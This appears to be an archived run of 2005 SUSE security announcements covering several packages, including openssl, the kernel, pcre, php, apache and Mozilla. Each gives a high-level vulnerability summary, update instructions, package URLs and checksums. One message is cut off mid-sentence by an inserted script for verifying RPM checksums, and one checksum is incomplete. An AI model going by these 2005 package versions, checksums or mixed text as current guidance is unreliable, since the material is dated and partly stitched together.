1) Problem Description and Brief Discussion

   The openssl cryptographic libraries have been updated to fix
   a protocol downgrading attack which allows a man-in-the-middle
   attacker to force the usage of SSLv2. This happens due to the
   work-around code of SSL_OP_MSIE_SSLV2_RSA_PADDING which is included
   in SSL_OP_ALL (which is commonly used in applications). (CAN-2005-2969)

   Additionally, this update adds GeoTrust's Equifax Root1 CA certificate
   to allow correct certification against Novell Inc. websites and
   services. The same CA is already included in Mozilla, KDE, and curl,
   which use separate certificate stores.

2) Solution or Work-Around

   Please install the updated packages.
   A work-around would be to disable SSL v2 support in the applications.

3) Special Instructions and Notes

   Restart all services using SSL communication.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-0.9.7g-2.2.i586.rpm
  e3327b60cd67e05c69fbad39787dccc9
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/openssl-devel-0.9.7g-2.2.i586.rpm
  24865cb7cc369352f0be0f6681c0337e

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-0.9.7e-3.2.i586.rpm
  83537e24205a2add698e1b3bdabd47da
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/openssl-devel-0.9.7e-3.2.i586.rpm
  24b05ddf75b1b1c1630f489c73009782

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/openssl-0.9.7d-25.2.i586.rpm
  eb5845c52c418f6c4dd54922854f282f
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/openssl-devel-0.9.7d-25.2.i586.rpm
  3489d04736d818da68ef83d148aa

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/openssl-0.9.7d-15.15.3.i586.rpm
  44fa57fcbdf8f3889bacb9cff6b1a09f
   
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/openssl-devel-0.9.7d-15.15.3.i586.rpm
  1faa73fc6dac13b05e40f5714f88b226
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/openssl-32bit-9.1-200510151708.i586.rpm
  d4b72038c4552fcba9fa11b554af2eac
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/openssl-devel-32bit-9.1-200510151708.i586.rpm
  6b4b1eeaa0592fd7a92816ceb4658494

   SuSE Linux 9.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/openssl-0.9.7b-135.i586.rpm
  cf17f027255eabe00df743ead5052f1a
   
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/openssl-devel-0.9.7b-135.i586.rpm
  9ffd642f59150064dbb04644990d22b8
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/i586/openssl-32bit-9.0-5.i586.rpm
  b411a2e07c627174edf3e59c36e2afea
   

[Full-disclosure] SUSE Security Announcement: kernel multiple security problems (SUSE-SA:2005:050)

2005-09-01 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:kernel
Announcement ID:SUSE-SA:2005:050
Date:   Thu, 01 Sep 2005 14:00:00 +
Affected Products:  9.1, 9.2, 9.3
SUSE Linux Enterprise Server 9
Novell Linux Desktop 9
Vulnerability Type: denial of service, local privilege escalation
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CAN-2005-2457
CAN-2005-2458
CAN-2005-2459
CAN-2005-2555
CAN-2005-2456
CAN-2005-0916

Content of This Advisory:
1) Security Vulnerability Resolved:
 various security issues and bugfixes for the Linux kernel
   Problem Description
2) Solution or Workaround
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Workarounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The Linux kernel was updated to fix the following security issues:
   - CAN-2005-2457: A problem in decompression of files on zisofs
 filesystem was fixed.

   - CAN-2005-2458: A potential buffer overflow in the zlib decompression
 handling in the kernel was fixed.

   - CAN-2005-2459: Some return codes in zlib decoding were fixed which
 could have led to an attacker crashing the kernel.

   - CAN-2005-2555: Only processes with the CAP_NET_ADMIN capability are
 now allowed to load socket policies.

   - CAN-2005-2456: Fixed a potential overflow caused by missing boundary
 checks of sock->sk_policy in net/xfrm/.

   - AMD64/EM64T/x86_64 only: A previous fix for a denial of service
 attack with compat 32bit mode programs was too strict and could
 crash the kernel.  (The earlier fix had the Mitre CVE ID CAN-2005-1765.)

   - S/390 only: Fixed /sys/ permissions where a user could change machine
 states, including powering down or up partitions.

   - CAN-2005-0916: PowerPC only: A missing patch for a hugetlb memory
 context handling problem was added.

   The above problems affect SUSE Linux 9.1 up to 9.3 and SUSE Linux
   Enterprise Server 9.

   Additionally, the following bugs were fixed for SUSE Linux Enterprise
   Server 9 and SUSE Linux 9.1:
   - The reported process start times sometimes were incorrect.
   - The OCFS2 filesystem was updated to version 1.0.2. (SLES 9 only)
   - A potential deadlock in cpuset handling was fixed.
   - Fixed a potential crash on startup of the tg3 network driver.
   - Avoid high IRQ latencies in the VM handling.
   - rpm/post.sh was fixed so that initrd.previous is preserved again.
   - A problem in the handling of the tape ioctl MTIOCPOS was fixed.
   - Make the OOM process killer send SIGTERM first instead of SIGKILL.
   - Fixed a netfilter connection track return code mismatch.
   - Fixed a typo in the ipt_TTL netfilter module.
   - XEN was updated to version 2.0.6b. (i386 only)
   - Allow rsize/wsize values less than 4096 for NFS mounts.
   - A data corruption problem within the reiserfs filesystem in
 the handling of writing to mmaped regions after close of the file
 descriptor was fixed.

2) Solution or Workaround

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

 SPECIAL INSTALLATION INSTRUCTIONS
 =
 The following paragraphs guide you through the installation
 process in a step-by-step fashion. The character sequence 
 marks the beginning of a new paragraph. In some cases, the steps
 outlined in a particular paragraph may or may not be applicable
 to your situation. Therefore, make sure that you read through
 all of the steps below before attempting any of these
 procedures. All of the commands that need to be executed must be
 run as the superuser 'root'. Each step relies on the steps
 before it to complete successfully.


    Step 1: Determine the needed kernel type.

 Use the following command to determine which kind of kernel is
 installed on your system:

   rpm -qf --qf '%{name}\n' /boot/vmlinuz


    Step 2: Download the packages for your system.

 Download the kernel RPM package for your distribution with the
 name indicated by Step 1. Starting from SUSE LINUX 9.2, kernel
 modules that are not free were moved to a separate package with
 the suffix '-nongpl' in its name. 

[Full-disclosure] SUSE Security Announcement: pcre integer overflows (SUSE-SA:2005:048)

2005-08-30 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:pcre
Announcement ID:SUSE-SA:2005:048
Date:   Tue, 30 Aug 2005 15:00:00 +
Affected Products:  9.0, 9.1, 9.2, 9.3
SUSE Linux Desktop 1.0
SUSE Linux Enterprise Server 8, 9
Novell Linux Desktop 9
Vulnerability Type: remote code execution
Severity (1-10):6
SUSE Default Package:   yes
Cross-References:   CAN-2005-2491

Content of This Advisory:
1) Security Vulnerability Resolved:
 pcre integer overflow security problem
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A vulnerability was found in the PCRE regular expression handling
   library which allows an attacker to crash or overflow a buffer in the
   program by specifying a special regular expression.

   Since this library is used in a large number of packages, including
   apache2, php4, exim, postfix and similar, a remote attack could be
   possible.

   This is tracked by the Mitre CVE ID CAN-2005-2491.

2) Solution or Work-Around

   Install the updated packages.

3) Special Instructions and Notes

   Please make sure you restart services linked against the pcre library
   (apache, exim, postfix).

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.


   x86 Platform:

   SUSE Linux 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/pcre-5.0-3.2.i586.rpm
  ccc4711c80659d57a7d06754d577a33c
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/pcre-devel-5.0-3.2.i586.rpm
  18ad1553287682ad09b2412dd038c5c5
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pcre-32bit-9.3-7.1.x86_64.rpm
  0246d39b1aa7bbfa8872a4f841d2842f

   SUSE Linux 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/pcre-4.5-2.2.i586.rpm
  d1c4af6faceecbbc028c5c5b32cd46bd
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/pcre-devel-4.5-2.2.i586.rpm
  276ecc193b12cf20e5ac1e2be2e9484c
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/pcre-32bit-9.2-200508260320.x86_64.rpm
  107c8c3ac5218348e89cc5d6a235f34d

   SUSE Linux 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pcre-4.4-109.4.i586.rpm
  0330a3dd845c33bd460851e13abdcb01
   
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pcre-devel-4.4-109.4.i586.rpm
  ca1722d18e465cce1e6be5fc69a97586
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/pcre-32bit-9.1-200508261306.i586.rpm
  2933451df49a408b53d9d2628fd74d38
   source rpm(s):
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/pcre-4.4-109.4.src.rpm
  131e5f816d7f9e6e8536416e574a2e07

   SUSE Linux 9.0:
   ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pcre-4.4-112.i586.rpm
  7f6492b3fdd2e9cf9ff104c7ef366fd2
   
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pcre-devel-4.4-112.i586.rpm
  c1e36f246764869a672f3e69c879a976
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/i586/pcre-32bit-9.0-5.i586.rpm
  7e4d12f5af0bc2a68d21a8d72ccb1d37
   source rpm(s):
   ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/pcre-4.4-112.src.rpm
  367ad88cdd0c0ec060992312e96a9997

   x86-64 Platform:

   SUSE Linux 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pcre-5.0-3.2.x86_64.rpm
  36c7d2b3713c27c79292a7637443a285
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pcre-devel-5.0-3.2.x86_64.rpm
  db8e83e2867c3d2f713a43705b655ffe
   source rpm(s):
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/pcre-5.0-3.2.src.rpm
  b4d17fa6f1f4359196b04495a7d6fb19

   SUSE Linux 9.2:
   

[Full-disclosure] SUSE Security Announcement: php4/php5 Pear::XML_RPC code injection and PCRE integer overflow problems (SUSE-SA:2005:049)

2005-08-30 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:php4, php5
Announcement ID:SUSE-SA:2005:049
Date:   Tue, 30 Aug 2005 15:00:00 +
Affected Products:  9.0, 9.1, 9.2, 9.3
SUSE Linux Enterprise Server 8, 9
Vulnerability Type: remote code execution
Severity (1-10):8
SUSE Default Package:   yes
Cross-References:   CAN-2005-2498
CAN-2005-2491


Content of This Advisory:
1) Security Vulnerability Resolved:
 Pear::XML_RPC code injection problem, pcre integer overflow
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   This update fixes the following security issues in the PHP scripting
   language.

   - Bugs in the PEAR::XML_RPC library allowed remote attackers to pass
 arbitrary PHP code to the eval() function (CAN-2005-1921,
 CAN-2005-2498).

 The Pear::XML_RPC library is not used by default in SUSE Linux, but
 might be used by third-party PHP applications.

   - An integer overflow bug was found in the PCRE (perl compatible regular
 expression) library which could be used by an attacker to potentially
 execute code. (CAN-2005-2491)

2) Solution or Work-Around

   Please install the updated packages.

3) Special Instructions and Notes

   Make sure you restart the web server using PHP after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



[Full-disclosure] SUSE Security Announcement: Adobe Reader Plugin buffer overflow (SUSE-SA:2005:047)

2005-08-22 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                acroread
Announcement ID:        SUSE-SA:2005:047
Date:                   Mon, 22 Aug 2005 12:00:00 +
Affected Products:      9.0, 9.1, 9.2, 9.3
                        SUSE Linux Enterprise Server 9
                        Novell Linux Desktop 9
                        Open Enterprise Server 9
Vulnerability Type:     remote code execution
Severity (1-10):        8
SUSE Default Package:   yes
Cross-References:       CAN-2005-2470

Content of This Advisory:
1) Security Vulnerability Resolved:
 acroread plugin buffer overflow
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A buffer overflow was found in the core application plug-in for the
   Adobe Reader that allows attackers to cause a denial of service
   (crash) and possibly execute arbitrary code via unknown vectors.

   This is tracked by the Mitre CVE ID CAN-2005-2470.

   Note that for SUSE Linux Enterprise Server 8 and SUSE Linux Desktop 1
   Acrobat Reader support was already discontinued by an earlier
   announcement.

2) Solution or Work-Around

   Please install the updated packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  gpg: Signature made DATE using RSA key ID 3D25D3D9
  gpg: Good signature from SuSE Security Team [EMAIL PROTECTED]

where DATE is replaced by the date the document was signed.

If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command

  gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  - Package authenticity verification:

SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the 
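The manual procedure from sections 4 and 6 above (download the RPMs, compare them with the MD5 sums printed under "Package Location and Checksums", and trust those sums only after the announcement's PGP signature has been checked) scripted as an added example; this is not SUSE's own tooling. It assumes the announcement was saved as a text file and that md5sum (or BSD md5) is on the PATH; the advisory excerpt and package files in demo_verify are constructed.

```shell
#!/bin/sh
# Added example (not part of the SUSE announcement): check downloaded update
# RPMs against the "URL / MD5 sum" pairs listed in section 4 of an advisory
# that was saved as text. The sums are only as trustworthy as the announcement
# itself, so run "gpg --verify" on it (section 6) before relying on them.

# Print "filename md5sum" for every package in advisory $1: an ftp:// URL
# line followed by a line whose only token is a 32-hex-digit MD5 sum.
advisory_checksums() {
    awk '
        /^[ \t]*ftp:\/\// { url = $1; next }
        url != "" && NF == 1 && length($1) == 32 && $1 ~ /^[0-9a-f]+$/ {
            n = split(url, p, "/"); print p[n], $1; url = ""; next
        }
        { url = "" }
    ' "$1"
}

# MD5 of one file, portable across GNU md5sum and BSD md5.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    else
        md5 -q "$1"
    fi
}

# Compare every package listed in advisory $1 with the copy in directory $2.
# Prints one line per package (OK / FAIL / MISSING) and returns 1 if any
# present package has a different sum than advertised, 0 otherwise.
# usage: verify_rpms SUSE-SA-2005-047.txt ./downloads
verify_rpms() {
    adv=$1; dir=$2; rc=0; tmp=$(mktemp)
    advisory_checksums "$adv" > "$tmp"
    while read -r name want; do
        if [ ! -f "$dir/$name" ]; then
            echo "MISSING $name"
        elif [ "$(file_md5 "$dir/$name")" = "$want" ]; then
            echo "OK $name"
        else
            echo "FAIL $name"; rc=1
        fi
    done < "$tmp"
    rm -f "$tmp"
    return $rc
}

# Constructed demo: a two-package excerpt in the advisory's layout, one file
# matching its listed sum (the MD5 of "hello\n") and one that was altered
# after the sum was published. Returns verify_rpms' status (1 here).
demo_verify() {
    T=$(mktemp -d)
    printf 'hello\n'    > "$T/pkg-good-1.0-1.i586.rpm"
    printf 'tampered\n' > "$T/pkg-bad-1.0-1.i586.rpm"
    cat > "$T/advisory.txt" <<'EOF'
   SUSE Linux 9.3:
   ftp://ftp.example.invalid/update/9.3/rpm/i586/pkg-good-1.0-1.i586.rpm
  b1946ac92492d2347c6235b4d2611184
   ftp://ftp.example.invalid/update/9.3/rpm/i586/pkg-bad-1.0-1.i586.rpm
  d41d8cd98f00b204e9800998ecf8427e
EOF
    verify_rpms "$T/advisory.txt" "$T"; rc=$?
    rm -rf "$T"
    return $rc
}
```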

[Full-disclosure] SUSE Security Announcement: apache, apache2 request smuggling problem (SUSE-SA:2005:046)

2005-08-16 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                apache, apache2
Announcement ID:        SUSE-SA:2005:046
Date:                   Tue, 16 Aug 2005 07:00:00 +
Affected Products:      8.2, 9.0, 9.1, 9.2, 9.3
                        SUSE Linux Enterprise Server 8, 9
Vulnerability Type:     authentication bypass
Severity (1-10):        6
SUSE Default Package:   no
Cross-References:       CAN-2005-2088
                        CAN-2005-1268


Content of This Advisory:
1) Security Vulnerability Resolved:
 apache and apache2 request smuggling
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A security flaw was found in the Apache and Apache2 web servers which
   allows remote attackers to smuggle requests past filters by providing
   handcrafted header entries.

   Fixed Apache 2 server packages were released on July 26th,
   fixed Apache 1 server packages were released on August 15th.

   This issue is tracked by the Mitre CVE ID CAN-2005-2088.

   The Apache2 packages additionally fix a single byte overflow in the SSL
   CRL handling functionality, tracked by the Mitre CVE ID CAN-2005-1268.

   The Apache1 packages additionally fix a harmless local buffer overflow
   in htpasswd.

2) Solution or Work-Around

   None, please install the updated packages.

3) Special Instructions and Notes

   Please restart the Apache web server after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



[Full-disclosure] SUSE Security Announcement: Mozilla various security problems (SUSE-SA:2005:045)

2005-08-11 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                mozilla, MozillaFirefox, epiphany, galeon
Announcement ID:        SUSE-SA:2005:045
Date:                   Thu, 11 Aug 2005 15:00:00 +
Affected Products:      8.2, 9.0, 9.1, 9.2, 9.3
                        SUSE Linux Desktop 1.0
                        SUSE Linux Enterprise Server 8, 9
                        Novell Linux Desktop 9
Vulnerability Type:     information leak
Severity (1-10):        7
SUSE Default Package:   yes
Cross-References:       MFSA 2005-56 CAN-2005-2270
                        MFSA 2005-55 CAN-2005-2269
                        MFSA 2005-54 CAN-2005-2268
                        MFSA 2005-53 CAN-2005-2267
                        MFSA 2005-52 CAN-2005-2266
                        MFSA 2005-51 CAN-2005-1937
                        MFSA 2005-50 CAN-2005-2265
                        MFSA 2005-49 CAN-2005-2264
                        MFSA 2005-48 CAN-2005-2263
                        MFSA 2005-47 CAN-2005-2262
                        MFSA 2005-46 CAN-2005-2261
                        MFSA 2005-45 CAN-2005-2260


Content of This Advisory:
1) Security Vulnerability Resolved:
 Various security problems in the Mozilla suite and Mozilla Firefox
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   Various security vulnerabilities in the Mozilla browser suite and
   the Mozilla Firefox browser have been reported and fixed upstream.

   The Mozilla suite browser has been updated to a security fix level
   of Mozilla 1.7.11, the Mozilla Firefox browser has been updated to
   a fix level of Firefox 1.0.6.


   Security relevant bugs that are fixed include (but are not limited to):

   MFSA 2005-56 Code execution through shared function objects
   MFSA 2005-55 XHTML node spoofing
   MFSA 2005-54 Javascript prompt origin spoofing
   MFSA 2005-52 Same origin violation: frame calling top.focus()
   MFSA 2005-51 The return of frame-injection spoofing
   MFSA 2005-50 Possibly exploitable crash in InstallVersion.compareTo()
   MFSA 2005-49 Stealing of sensitive information via _search and the Firefox sidebar
   MFSA 2005-48 Same-origin violation with InstallTrigger callback
   MFSA 2005-47 Set as wallpaper javascript: privilege escalation
   MFSA 2005-46 XBL scripts ran even when Javascript disabled
   MFSA 2005-45 Content-generated event vulnerabilities


   This update also upgrades the version of the Mozilla suite for the
   following products:

   * SUSE Linux Desktop 1.0:
 The original Mozilla 1.4 branch browser is upgraded to the Mozilla
 1.7 branch version.

 We were not able to port the galeon web browser included in SUSE
 Linux Desktop 1.0 to support Mozilla 1.7 in time, so we no longer
 support it.

 The galeon package on SUSE Linux Desktop 1.0 is removed by this update.

   * SUSE Linux Enterprise Server 8:
 The original Mozilla 1.4 branch browser is upgraded to the Mozilla
 1.7 branch version.

   * SUSE Linux Enterprise Server 9:
 The Mozilla version 1.6 shipped with GA of the SUSE Linux Enterprise
 Server 9 was replaced by the Mozilla 1.7 branch version in Service
 Pack 2.

   * SUSE Linux 8.2, 9.0, 9.1:
 The Mozilla version 1.4 and 1.6 contained in the SUSE Linux versions
 8.2 up to 9.1 was replaced by the Mozilla 1.7 branch version.

 We were not able to port the galeon and the epiphany web browsers
 included in SUSE Linux 9.0 up to 9.1 to support Mozilla 1.7 in time,
 so we will no longer support them.

 The galeon and epiphany packages on SUSE Linux 9.0 and 9.1 are removed
 by this update.

2) Solution or Work-Around

   Please install the upgraded packages and make sure you restart your
   browsers after the update.

   A workaround would be to deinstall the Mozilla browser suite and/or
   the Firefox web browser.

3) Special Instructions and Notes

   Please note that galeon will be deinstalled by this update on SUSE
   Linux Desktop 1.0, SUSE Linux 8.2, 9.0 and 9.1.

   Also note that epiphany will be deinstalled by this update on SUSE
   Linux 9.0 and 9.1.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates 

[Full-disclosure] SUSE Security Announcement: php/pear XML RPC remote code execution (SUSE-SA:2005:041)

2005-07-08 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                php/pear XML::RPC
Announcement ID:        SUSE-SA:2005:041
Date:                   Fri, 08 Jul 2005 16:00:00 +
Affected Products:      8.2, 9.0, 9.1, 9.2, 9.3
                        SUSE Linux Enterprise Server 9
Vulnerability Type:     remote code execution
Severity (1-10):        6
SUSE Default Package:   no
Cross-References:       CAN-2005-1921

Content of This Advisory:
1) Security Vulnerability Resolved:
 PHP XML::RPC code injection vulnerability
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A bug in the PEAR::XML_RPC library allowed remote attackers to
   pass arbitrary PHP code to the eval() function.

   The updated php packages fix the XML::RPC bug; however, several third
   party PHP packages include a copy of the problematic XML::RPC code
   itself and might still be vulnerable after the update.

   Please check their respective websites whether the package is
   vulnerable.

   The following projects are known to include the XML::RPC code:
- tikiwiki
- postnuke
- drupal
- b2evolution
- b2
- phpGroupWare
- eGroupware
- Serendipity Weblog
- phpAdsNew
- Max Media Manager

   This issue is tracked by the Mitre CVE ID CAN-2005-1921.

   The bug in the SUSE php packages affects SUSE Linux versions from 8.2
   up to 9.3, SUSE Linux Enterprise Server 9 and Open Enterprise Server.

   php4 on SUSE Linux Enterprise Server 8 is not affected, since it was
   not shipping the XML::RPC extension.

2) Solution or Work-Around

   Please install the updated packages.

3) Special Instructions and Notes

   Make sure that any additional PHP projects you have installed also have
   the XML RPC flaw fixed.


4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



[Full-disclosure] SUSE Security Announcement: zlib denial of service attack (SUSE-SA:2005:039)

2005-07-06 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                zlib
Announcement ID:        SUSE-SA:2005:039
Date:                   Wed, 06 Jul 2005 14:00:00 +
Affected Products:      9.1, 9.2, 9.3
                        SUSE Linux Enterprise Server 9
                        Novell Linux Desktop 9
                        Open Enterprise Server
Vulnerability Type:     remote denial of service
Severity (1-10):        7
SUSE Default Package:   yes
Cross-References:       CAN-2005-2096

Content of This Advisory:
1) Security Vulnerability Resolved:
 zlib denial of service attack
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A denial of service condition was fixed in the zlib library.

   Any program using zlib to decompress data can be crashed by a specially
   handcrafted invalid data stream. This includes web browsers or email
   programs able to view PNG images (which are compressed by zlib),
   allowing remote attackers to crash browser sessions or potentially
   anti-virus programs using this vulnerability.

   This issue is tracked by the Mitre CVE ID CAN-2005-2096.

   Since only zlib 1.2.x is affected, older SUSE products are not affected
   by this problem.

2) Solution or Work-Around

   Install the updated packages.

3) Special Instructions and Notes

   Please restart running programs using zlib.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



[Full-disclosure] SUSE Security Announcement: RealPlayer remote buffer overflow (SUSE-SA:2005:037)

2005-06-27 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                RealPlayer
Announcement ID:        SUSE-SA:2005:037
Date:                   Mon, 27 Jun 2005 12:00:00 +
Affected Products:      SUSE LINUX 9.2, 9.3
                        Novell Linux Desktop 9

Vulnerability Type:     remote code execution
Severity (1-10):        8
SUSE Default Package:   yes
Cross-References:       CAN-2005-1766
                        CAN-2005-1277

Content of This Advisory:
1) Security Vulnerability Resolved:
 remote buffer overflow in RealPlayer
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   Various security problems were found in RealPlayer that allow a remote
   attacker to execute code in the local player by providing handcrafted
   files.

   See also http://service.real.com/help/faq/security/050623_player/EN/

   The following security bugs are listed:
   - To fashion a malicious MP3 file to allow the overwriting of a local
 file or execution of an ActiveX control on a customer's machine.

   - To fashion a malicious RealMedia file which uses RealText to cause
 a heap overflow to allow an attacker to execute arbitrary code on a
 customer's machine.

